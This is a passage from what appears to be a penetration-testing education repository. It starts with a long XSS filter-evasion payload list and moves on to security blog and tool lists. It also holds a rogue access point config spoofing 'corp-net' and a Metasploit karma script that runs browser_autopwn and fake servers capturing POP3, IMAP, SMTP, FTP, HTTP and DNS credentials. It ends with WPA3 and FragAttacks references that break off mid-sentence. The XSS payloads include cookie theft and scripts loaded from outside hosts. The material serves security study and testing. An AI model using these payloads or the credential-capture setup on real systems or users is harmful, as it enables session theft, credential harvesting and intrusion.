ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert&#x28;1&#x29;">X </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror = prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input type&#61;"date" onfocus="alert(1)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt;!--&gt;&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> ``` ## OWASP XSS Evasion Cheat Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Markdown
h4cker/who-and-what-to-follow/README.md
# Blogs, YouTube Channels, Twitch Streamers, and Podcasts ## Cyber Security Blogs to Follow (sorted alphabetically) - [Ars Technica ](https://arstechnica.com) - [Becoming a Hacker](https://becomingahacker.org) - [Bruce Schneier's Blog](https://www.schneier.com) - [CIO](https://www.cio.com/category/security) - [Cisco Security Blog](https://blogs.cisco.com/security) - [CSO Online ](https://www.csoonline.com) - [Cyber Defense Magazine ](https://www.cyberdefensemagazine.com/) - [cyberscoop ](https://www.cyberscoop.com/) - [Darknet ](https://www.darknet.org.uk/) - [Dark Reading ](http://www.darkreading.com/) - [Data Breaches ](https://www.databreaches.net/) - [Decipher ](https://duo.com/decipher/) - [Didier Stevens Blog ](https://blog.didierstevens.com/) - [Epic ](https://epic.org/) - [Errata Security ](https://blog.erratasec.com/) - [Exploit Databse ](https://www.exploit-db.com/) - [F-Secure Safe & Savvy Blog ](http://safeandsavvy.f-secure.com) - [FireEye Blog ](https://www.fireeye.com/blog.html) - [Fox IT Security Blog ](http://blog.fox-it.com) - [Google Online Security Blog ](https://googleonlinesecurity.blogspot.ro) - [Graham Cluley ](https://www.grahamcluley.com) - [Hack Read ](https://www.hackread.com/) - [Heimdal Security Blog ](https://heimdalsecurity.com/blog/) - [Help Net Security ](https://www.net-security.org) - [Information Security Buzz ](https://www.informationsecuritybuzz.com/) - [InfoSecurity Magazine ](http://www.infosecurity-magazine.com) - [Kaspersky Lab’s Securelist ](https://securelist.com) - [Kaspersky Lab’s ThreatPost ](https://threatpost.com) - [KnowBe4 Blog ](https://blog.knowbe4.com/) - [Krebs on Security](https://krebsonsecurity.com) - [Malware Must Die](https://blog.malwaremustdie.org) - [Malwarebytes Labs ](https://blog.malwarebytes.org) - [Mashable ](http://mashable.com/category/cybersecurity) - [McAfee security blog ](http://blogs.mcafee.com) - [Microsoft Malware Protection Center ](http://blogs.technet.com/b/mmpc) - [Motherboard Vice ](http://motherboard.vice.com/en_us) - [Naked Security ](https://nakedsecurity.sophos.com) - [OpenDNS (Cisco Umbrella) Blog ](https://blog.opendns.com) - [OWASP -Not a blog, but a must - ](https://www.owasp.org) - [Packet Storm Security ](https://packetstormsecurity.com/) - [Paul’s Security Weekly ](http://securityweekly.com) - [PCMag’s Security Watch ](http://securitywatch.pcmag.com) - [Peerlyst ](https://www.peerlyst.com) - [Phish Labs Blog ](https://info.phishlabs.com/blog/) - [SANS Blogs ](https://www.sans.org/security-resources/blogs) - [SC Magazine ](https://www.scmagazine.com) - [Security Affairs ](https://securityaffairs.co/wordpress/) - [Security Magazine ](https://www.securitymagazine.com/) - [Security Week ](https://www.securityweek.com/) - [Softpedia ](https://www.softpedia.com/) - [Spiceworks Security ](https://community.spiceworks.com/security/general/) - [SpiderLabs Security Blog ](https://www.trustwave.com/Resources/SpiderLabs-Blog) - [TALOS](https://www.talosintelligence.com/) - [Tao Security ](https://taosecurity.blogspot.com) - [Techcrunch ](https://techcrunch.com/tag/security) - [TechTarget Security ](http://searchsecurity.techtarget.com/) - [Techworld Security ](http://www.techworld.com/security) - [The Art of Hacking courses GitHub repository ](https://github.com/The-Art-of-Hacking/art-of-hacking) - [The Guardian Information Security Hub ](https://www.theguardian.com/technology/data-computer-security) - [The Hacker News ](http://thehackernews.com) - [The Register ](http://www.theregister.co.uk) - [ThreatPost](https://threatpost.com) - [ThreatWire ](http://www.threatwire.net/) - [TrendMicro Blog ](https://blog.trendmicro.com/trendlabs-security-intelligence/) - [Tripwire Blog ](https://www.tripwire.com/state-of-security/) - [Troy Hunt ](https://www.troyhunt.com) - [US-CERT ](https://www.us-cert.gov) - [Webroot Blog ](https://www.webroot.com/blog/) - [Wired Threat Level ](http://www.wired.com/category/threatlevel ) - [Zero Day ](http://www.zdnet.com/blog/security) ## YouTube - [AppSec Village](https://www.youtube.com/c/appsecvillage) - [BlackHills InfoSec](https://www.youtube.com/channel/UCJ2U9Dq9NckqHMbcUupgF0A) - [DEF CON](https://www.youtube.com/channel/UC6Om9kAkl32dWlDSNlDS9Iw) - [HackerSploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) - [Jason Haddix](https://www.twitch.tv/nahamsec) - [John Hammond](https://www.youtube.com/user/RootOfTheNull) - [LiveOverFlow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - [NullByte](https://www.youtube.com/channel/UCgTNupxATBfWmfehv21ym-g) - [Red Team Village](https://www.youtube.com/redteamvillage) - [Security Weekly](https://www.youtube.com/user/SecurityWeeklyTV) - [STÖK](https://www.youtube.com/channel/UCQN2DsjnYH60SFBIA6IkNwg) - [The Art of Hacking](https://www.youtube.com/theartofhacking) - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) ## Twitch - [Red Team Village](https://twitch.tv/redteamvillage) - [Nahamsec](https://www.twitch.tv/nahamsec) - [Blue Team Village](https://www.twitch.tv/blueteamvillage) - [IoT Village](https://www.twitch.tv/iotvillage) - [BugCrowd](https://www.twitch.tv/bugcrowd) - [HackerOne](https://www.twitch.tv/hackeronetv) - [The Cyber Mentor](https://www.twitch.tv/thecybermentor) ## Podcasts - [DarkNet Diaries](https://darknetdiaries.com/) - [Security Weekly](https://securityweekly.com/) - [Risky Business](https://risky.biz/netcasts/risky-business/) - [Firewalls Don’t Stop Dragons](https://firewallsdontstopdragons.com/podcast/) - [The Unsupervised Learning Podcast](https://danielmiessler.com/podcast/#gs.=RDc3aY) - [Down the Security Rabbithole](http://podcast.wh1t3rabbit.net/) - [Smashing Security](https://www.smashingsecurity.com/) - [The Cyberwire](https://thecyberwire.com/) - [The CyberJungle](http://www.thecyberjungle.com/) - [Beer with Talos](https://talosintelligence.com/podcasts/shows/beers_with_talos) - [Talos Takes](https://talosintelligence.com/podcasts/shows/talos_takes) - [Open Source Security Podcast](https://opensourcesecurity.io/category/podcast/) - [Crypto-Gram Security Podcast](http://crypto-gram.libsyn.com/) - [The Privacy, Security and OSINT Show](https://inteltechniques.com/podcast.html)
Markdown
h4cker/windows/README.md
# Resources for Windows-based Assessments ## Tools used for Windows-based Assessments - [PowerShell Empire](http://www.powershellempire.com/) - [CimSweep](https://github.com/PowerShellMafia/CimSweep) - [Responder](https://github.com/lgandx/Responder) - A LLMNR, NBT-NS and MDNS poisoner - [BloodHound](https://github.com/BloodHoundAD/BloodHound) - Six Degrees of Domain Admin - [AD Control Path](https://github.com/ANSSI-FR/AD-control-paths) - Active Directory Control Paths auditing and graphing tools - [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/) - A PowerShell Post-Exploitation Framework - [PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) - Situational Awareness PowerShell framework - [PowerSCCM](https://github.com/PowerShellMafia/PowerSCCM) - Functions to facilitate connections to and queries from SCCM databases and WMI interfaces for both offensive and defensive applications. - [Empire](https://github.com/EmpireProject/Empire) - PowerShell and Python post-exploitation agent - [Mimikatz](https://github.com/gentilkiwi/mimikatz) - Utility to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory but also perform pass-the-hash, pass-the-ticket or build Golden tickets - [UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control - [Windows System Internals](https://technet.microsoft.com/en-us/sysinternals/bb545021.aspx) - (Including Sysmon etc.) - [Hardentools](https://github.com/securitywithoutborders/hardentools) - Collection of simple utilities designed to disable a number of "features" exposed by Windows - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - A swiss army knife for pentesting Windows/Active Directory environments ## Additional Resources - [PaulSec Windows Resource Repository](https://github.com/PaulSec/awesome-windows-domain-hardening) - [Tools Cheatsheets](https://github.com/HarmJ0y/CheatSheets) - (Beacon, PowerView, PowerUp, Empire, ...) - [SANS PowerShell Cheat Sheet](https://www.sans.org/blog/sans-pen-test-cheat-sheet-powershell/) - [The Active Directory module for Windows PowerShell is a PowerShell module that consolidates a group of cmdlets.](https://docs.microsoft.com/en-us/powershell/module/addsadministration/?view=win10-ps)
h4cker/wireless_resources/hostapd.conf
# Enable WPA. Setting this variable configures the AP to require WPA (either # WPA-PSK or WPA-RADIUS/EAP based on other configuration). For WPA-PSK, either # wpa_psk or wpa_passphrase must be set and wpa_key_mgmt must include WPA-PSK. # For WPA-RADIUS/EAP, ieee8021x must be set (but without dynamic WEP keys), # RADIUS authentication server must be configured, and WPA-EAP must be included # in wpa_key_mgmt. # This field is a bit field that can be used to enable WPA (IEEE 802.11i/D3.0) # and/or WPA2 (full IEEE 802.11i/RSN): # bit0 = WPA # bit1 = IEEE 802.11i/RSN (WPA2) wpa=1 interface=wlan0 ssid=corp-net hw_mode=g channel=11 logger_syslog=-1 logger_syslog_level=2 driver=nl80211 # WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit # secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase # (8..63 characters) that will be converted to PSK. This conversion uses SSID # so the PSK changes when ASCII passphrase is used and the SSID is changed. #wpa_psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef wpa_passphrase=omarsucks # Set of accepted key management algorithms (WPA-PSK, WPA-EAP, or both). The # entries are separated with a space. wpa_key_mgmt=WPA-PSK # Set of accepted cipher suites (encryption algorithms) for pairwise keys # (unicast packets). This is a space separated list of algorithms: # CCMP = AES in Counter mode with CBC-MAC [RFC 3610, IEEE 802.11i] # TKIP = Temporal Key Integrity Protocol [IEEE 802.11i] # Group cipher suite (encryption algorithm for broadcast and multicast frames) # is automatically selected based on this configuration. If only CCMP is # allowed as the pairwise cipher, group cipher will also be CCMP. Otherwise, # TKIP will be used as the group cipher. #wpa_pairwise=TKIP CCMP # Time interval for rekeying GTK (broadcast/multicast encryption keys) in # seconds. wpa_group_rekey=600 # Time interval for rekeying GMK (master key used internally to generate GTKs # (in seconds). wpa_gmk_rekey=86400 # Enable IEEE 802.11i/RSN/WPA2 pre-authentication. This is used to speed up # roaming be pre-authenticating IEEE 802.1X/EAP part of the full RSN # authentication and key handshake before actually associating with a new AP. #rsn_preauth=1 # # Space separated list of interfaces from which pre-authentication frames are # accepted (e.g., 'eth0' or 'eth0 wlan0wds0'. This list should include all # interface that are used for connections to other APs. This could include # wired interfaces and WDS links. The normal wireless data interface towards # associated stations (e.g., wlan0) should not be added, since # pre-authentication is only used with APs other than the currently associated # one. #rsn_preauth_interfaces=eth0 # ##CC=ccache gcc
Text
h4cker/wireless_resources/karma.rc_.txt
db_connect postgres:[email protected]/msfbook use auxiliary/server/browser_autopwn setg AUTOPWN_HOST 10.0.0.1 setg AUTOPWN_PORT 55550 setg AUTOPWN_URI /ads set LHOST 10.0.0.1 set LPORT 45000 set SRVPORT 55550 set URIPATH /ads run use auxiliary/server/capture/pop3 set SRVPORT 110 set SSL false run use auxiliary/server/capture/pop3 set SRVPORT 995 set SSL true run use auxiliary/server/capture/ftp run use auxiliary/server/capture/imap set SSL false set SRVPORT 143 run use auxiliary/server/capture/imap set SSL true set SRVPORT 993 run use auxiliary/server/capture/smtp set SSL false set SRVPORT 25 run use auxiliary/server/capture/smtp set SSL true set SRVPORT 465 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 5353 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 53 run use auxiliary/server/capture/http set SRVPORT 80 set SSL false run use auxiliary/server/capture/http set SRVPORT 8080 set SSL false run use auxiliary/server/capture/http set SRVPORT 443 set SSL true run use auxiliary/server/capture/http set SRVPORT 8443 set SSL true run
Markdown
h4cker/wireless_resources/README.md
# Wireless Attack Resources The following are several resources describing different wireless attacks, vulnerabilities, and mitigations. I also included several tips on how to build your own wireless hacking lab. ## How to Build Your Own Wireless Hacking Lab - [Penetration Testing and Wireless Adapters](https://github.com/The-Art-of-Hacking/h4cker/blob/master/wireless_resources/wireless_adapters.md): As you learned either in one of my books, courses, or in the Internet, there are many challenges with different wireless adapters, Linux, and wireless penetration testing tools. This is a fact especially when trying to perform promiscuous monitoring and injecting packets into the wireless network. [These are my notes](https://github.com/The-Art-of-Hacking/h4cker/blob/master/wireless_resources/wireless_adapters.md) of some of the most popular wireless adapters used by penetration testers (ethical hackers) in the industry. - [Build your WiFi environment with Linux Kernel Modules](https://github.com/The-Art-of-Hacking/h4cker/blob/master/wireless_resources/virtual_adapters.md): You can use mac80211_hwsim is a software simulator of 802.11 radio(s) for mac80211 in Kali Linux, Parrot Security and other Linux distributions. [In this section](https://github.com/The-Art-of-Hacking/h4cker/blob/master/wireless_resources/virtual_adapters.md) I demonstrate how to use the mac80211_hwsim Linux kernel module to create your own wireless learning lab without the need of buying any adapters. - [Additional Tools and Other Resources](https://github.com/The-Art-of-Hacking/h4cker/blob/master/wireless_resources/tools_and_online_resources.md): A collection of additional tools and learning resources. ## Attacks Against WPA3 Mathy Vanhoef discovered several vulnerabilties that affect the WPA3 WiFi protocol. There are two categories in these attacks. The first category consists of downgrade attacks against WPA3-capable devices, and the second category consists of weaknesses in the Dragonfly handshake of WPA3, which in the Wi-Fi standard is better known as the Simultaneous Authentication of Equals (SAE) handshake. ### Dragonfly Handshake and other WPA3 Attacks The following are several references to these attacks: - [WPA3 Dragonblood](https://wpa3.mathyvanhoef.com) - [CERT ID #VU871675](https://www.kb.cert.org/vuls/id/VU871675): Downgrade attack against WPA3-Transtition mode leading to dictionary attacks. - [CERT ID #VU871675](https://www.kb.cert.org/vuls/id/VU871675): Security group downgrade attack against WPA3's Dragonfly handshake. - [CVE-2019-9494](https://nvd.nist.gov/vuln/detail/CVE-2019-9494): Timing-based side-channel attack against WPA3's Dragonfly handshake and Cache-based side-channel attack against WPA3's Dragonfly handshake. - [CERT ID #VU871675](https://www.kb.cert.org/vuls/id/VU871675): Resource consumption attack (i.e. denial of service) against WPA3's Dragonfly handshake. - [CERT ID #VU871675](https://kb.cert.org/vuls/id/871675/): Overview of attacks specific to hostapd and wpa_supplicant (does not cover other implementations). - [CVE-2019-9495](https://nvd.nist.gov/vuln/detail/CVE-2019-9495): Cache-based side-channel attack against the EAP-pwd implementation of hostapd and wpa_supplicant. - [CVE-2019-9497](https://nvd.nist.gov/vuln/detail/CVE-2019-9497): Reflection attack against the EAP-pwd implementation of hostapd and wpa_supplicant. - [CVE-2019-9498](https://nvd.nist.gov/vuln/detail/CVE-2019-9498): Invalid curve attack against the EAP-pwd server of hostapd resulting in authentication bypass. - [CVE-2019-9499](https://nvd.nist.gov/vuln/detail/CVE-2019-9499): Invalid curve attack against the EAP-pwd client of wpa_supplicant resulting in server impersonation. - [CVE-2019-11234](https://nvd.nist.gov/vuln/detail/CVE-2019-11234): Reflection attack against the EAP-pwd implementation of FreeRADIUS. - [CVE-2019-11235](https://nvd.nist.gov/vuln/detail/CVE-2019-11235): Invalid curve attack against the EAP-pwd server of FreeRADIUS resulting in authentication bypass. ### FragAttacks (fragmentation and aggregation attacks) [FragAttacks](https://www.fragattacks.com/) is a series of vulnerabilities also found by Mathy Vanhoef. An adversary that is within range of a victim's Wi-Fi network can abuse these vulnerabilities to steal user information or attack devices. Three of the discovered vulnerabilities are design flaws in the Wi-Fi standard and therefore affect most devices. #### Design Flaws - **CVE-2020-24588: Accepting non-SPP A-MSDU frames**: The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that the A-MSDU flag in the plaintext QoS header field is authenticated. Against devices that support receiving non-SPP 